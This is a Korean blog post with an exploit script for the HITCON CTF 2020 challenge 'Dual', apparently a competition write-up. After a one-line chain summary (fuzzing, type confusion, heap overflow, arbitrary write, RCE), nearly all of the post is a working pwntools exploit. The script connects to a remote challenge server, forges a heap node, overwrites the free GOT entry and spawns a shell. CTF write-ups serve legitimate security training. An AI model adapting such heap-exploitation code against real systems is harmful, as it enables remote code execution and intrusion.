본문 바로가기

PWN

HITCON CTF 2020 / Dual

Fuzzing with AFL -> Awesome crash -> Type confusion -> Heap Overflow ->AAW -> RCE

 

from pwn import *

def go(a,b):
    p.recvuntil(str(a))
    p.sendline(str(b))
def add(pred):
    go(">",'1')
    go(">",pred)
def link(pred,succ):
    go(">",'2')
    go(">",pred)
    go('>',succ)
#payload = open("null").read()
#print(payload.encode('hex'))
payload =b"""5
E23

7
1
E2
7
7?
4

%d
"""%(0x39)
##FAKE NODE #####
payload+=p64(0xdead)#find id
payload+=p64(0x22)
payload+=p64(0x33)#linked pointer
payload+=p64(0x44)
payload+=p64(0x55)
payload+=p64(0xdeadbeef) #text size
payload+=p64(0x0)#text idx
#################


payload+=b"""
5
E23

"""


#### command with fake node ###
payload+=b"""4
%d
"""%0xdead

#p= process('dual-2df8d4005c5d4ffc03183a96a5d9cb55ac4ee56dfb589d65b0bf4501a586a4b0')
p = remote("13.231.226.137", 9573)
cmd = "set $pool = 0x519170\n"
#cmd+="b find_node\n"
#cmd+="b *0x040468B  \n" #find_node -> compare
#cmd+="b *0x000000404D5C    \n" #write_text -> call find_node
#cmd+="b *0x404CB4\n" #break new in write_text
#cmd+="b *0x0404CEB  \n" #break free in write_text
cmd+="b *0x044B95A \n"
cmd+="c\n"
#gdb.attach(p,cmd)
p.send(payload)

payload = b"\x00"*(0x68+0x78)
payload+=b"a"*(0x70-0x23-0x8)
payload+=p64(0x21)#freed chunk's meta data
payload+=b"c"*(0x23-8)
payload+=p64(0x21)
payload+=p64(0x0519068) #free GOT
p.sendline("%d"%(len(payload)+1))
p.sendline(payload)

p.sendline("4")
p.sendline("0")#idx
p.sendline("20")
p.sendline("a"*19)

p.sendline("4")
p.sendline("0")
p.sendline("24")
payload = p64(0x044B95A)
payload = payload.ljust(23)
p.sendline(payload)
p.sendline("/bin/sh")
p.interactive()

'PWN' 카테고리의 다른 글

Ida python for bug hunting  (0) 2021.03.11
Assaultcube Fuzzing  (0) 2021.02.04
사이버작전경연대회 2020 / vaccinesimulator  (0) 2020.09.15
pwnable.kr / crcgen  (0) 2020.07.16
ASIS CTF 2020 / shared_house  (0) 2020.07.08